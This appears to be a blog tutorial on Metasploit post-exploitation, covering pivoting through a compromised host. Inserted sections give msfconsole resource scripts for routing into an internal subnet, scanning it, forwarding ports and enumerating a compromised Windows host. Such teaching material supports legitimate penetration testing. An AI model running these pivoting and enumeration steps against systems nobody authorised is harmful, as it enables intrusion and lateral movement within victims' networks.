Metasploit has become the standard framework used in penetration testing. It bundles a large collection of publicly known exploits, payloads and auxiliary modules behind one console. The
tool has its pros and cons; some advantages are:
- It automates much of the penetration testing workflow
- Fast (less time required)
- Reliable
- It offers a lot of advanced features that we will discuss step by step
Just as a comparison between automatic and manual penetration testing and vulnerability assessment approaches: the automatic process is fast, but in some cases does not give the desired result. Manual testing is slow but more precise, and we cannot neglect it. As far as disadvantages go, Metasploit shares the one weakness of every automated tool: it can only use the exploits it ships with. If the target's software is fully patched, Metasploit will fail. (There are many ways of using Metasploit; here "fail" means that it cannot exploit any available vulnerability.) In that case we will certainly need a manual test to find a 0-day vulnerability. This is the weakness of Metasploit. However, Metasploit is a hot topic among penetration testers, many advances have been made, and the security community is continually working to make it even more useful.
Metasploit is built around a module system: exploits, payloads, auxiliary modules, post modules and encoders are all modules loaded into the framework.
From this point onward, I will assume that you are familiar with the basic usage of Metasploit: msfconsole, Meterpreter, and the exploit, payload and auxiliary modules.
Post Exploitation
The main objective in discussing post exploitation is to cover Meterpreter scripting. Post exploitation is the set of techniques, methods and procedures used to identify and monitor a compromised host and to find a way of keeping access to it in the future.
What is post exploitation? Why is post exploitation important? These questions are important for understanding the phenomenon, so let us suppose you have successfully hacked (compromised) a host, but want to use this session at some later time. It is not good practice to start all over again, and what if you fail next time? Therefore, the best method is to prepare the compromised system for the next use. The other side of post exploitation is to use the compromised host as an attacker machine and to attack some other host or network through it. Consider the picture below:
The above diagram shows the importance of post exploitation. Let us suppose that an attacker has successfully compromised victim A. Now the attacker wants to reach the web server, which sits on the same internal network as victim A and is not directly reachable from outside. Attacking a host on the same network is much easier than a remote attack: instead of attacking the web server directly, the attacker uses victim A as a pivot and attacks the internal network through it. This is what is known as the post exploitation phase.
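The pivot described above, written out as an msfconsole resource script. This is an added example, not code from the original article. It assumes a Meterpreter session with id 1 on victim A, an internal subnet 10.10.10.0/24 and a web server at 10.10.10.5 (all three are assumptions for illustration); the commands and module names are standard Metasploit ones:

```text
# pivot.rc (constructed example, not from the original article)
# Assumes: session 1 = Meterpreter on victim A; internal subnet 10.10.10.0/24;
#          web server at 10.10.10.5. Load with:  msfconsole -r pivot.rc
#          or, inside msfconsole:  resource pivot.rc

# 1. Confirm the session is alive
sessions -l

# 2. Send traffic for the internal subnet through session 1.
#    Framework-native modules honour this route table; external tools do not.
route add 10.10.10.0 255.255.255.0 1
route print

#    Alternative: let the post module read victim A's interfaces and add
#    routes for every subnet it is attached to.
use post/multi/manage/autoroute
set SESSION 1
set CMD autoadd
run

# 3. Find hosts and ports on the internal network through the pivot
use auxiliary/scanner/portscan/tcp
set RHOSTS 10.10.10.0/24
set PORTS 80,443,8080
set THREADS 10
run

# 4. Fingerprint the web server that was found
use auxiliary/scanner/http/http_version
set RHOSTS 10.10.10.5
set RPORT 80
run

# 5. Expose the pivot to tools outside the framework (proxychains, a browser)
#    Older versions ship this as auxiliary/server/socks4a instead.
use auxiliary/server/socks_proxy
set SRVHOST 127.0.0.1
set SRVPORT 1080
set VERSION 4a
run -j

# 6. Or forward one internal port to the attacker's own machine; this one is
#    typed at the Meterpreter prompt of session 1, not in msfconsole:
#    meterpreter > portfwd add -l 8080 -p 80 -r 10.10.10.5
#    after which http://127.0.0.1:8080/ on the attacker box reaches the web server.
```

One caveat that trips up practitioners: a route only carries traffic from the framework into the internal network. If you later launch an exploit against 10.10.10.5 with a reverse payload, the internal host must be able to connect back to LHOST, which it usually cannot; use a bind payload, or set LHOST to victim A's internal address and add a matching `portfwd` there, so the callback comes back through the pivot.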
To conclude, the post exploitation phase is the process of:
- Infrastructure analysis
- Routing analysis
- Protocol analysis
- DNS server analysis
- ARP analysis
- Proxy server analysis
- Host machine analysis (virtual or real host)
- Services and software analysis
- Sharing analysis
- Directory, name server and certificate analysis
- Backup and patch management analysis
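To make the list above concrete, here is an added example (not from the original article) mapping each analysis item onto Metasploit post modules, again as an msfconsole resource script. It assumes session 1 is a Meterpreter session on a Windows host and that the internal subnet is 10.10.10.0/24 (both assumptions); the module paths are real framework modules, but check them against your version with `search post/windows/gather` before relying on them:

```text
# post_enum.rc (constructed example, not from the original article)
# Assumes: session 1 = Meterpreter on a Windows host; internal subnet 10.10.10.0/24.
# setg puts SESSION in the global datastore so every post module below picks it up.
setg SESSION 1

# Host machine analysis (virtual or real)
use post/windows/gather/checkvm
run

# Infrastructure, routing and ARP analysis: which networks can this host see?
use post/windows/gather/arp_scanner
set RHOSTS 10.10.10.0/24
run
use post/multi/gather/ping_sweep
set RHOSTS 10.10.10.0/24
run

# Proxy server analysis
use post/windows/gather/enum_proxy
run

# Services and software analysis
use post/windows/gather/enum_services
run
use post/windows/gather/enum_applications
run

# Sharing analysis
use post/windows/gather/enum_shares
run

# Directory and name server analysis (domain membership, controllers, members)
use post/windows/gather/enum_domain
run
use post/windows/gather/enum_computers
run

# Patch management analysis, and what the missing patches imply
use post/windows/gather/enum_patches
run
use post/multi/recon/local_exploit_suggester
run
```

Routing tables, DNS settings, certificates and backups are quickest to read from a shell on the host rather than a dedicated module: drop into one with `shell` from the Meterpreter prompt and use `route print`, `ipconfig /all` (DNS servers and search suffixes), `certutil -store My` (the machine's personal certificate store) and `wbadmin get versions` (Windows Server Backup history). Everything these modules collect ends up in the framework database, so run `hosts`, `services` and `notes` afterwards to review it in one place.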
To be continued:
This is the introductory part of the article, discussing the foundation of post exploitation. In the next article of this series we will discuss the practical side of Meterpreter scripting. Stay updated and do not forget to share.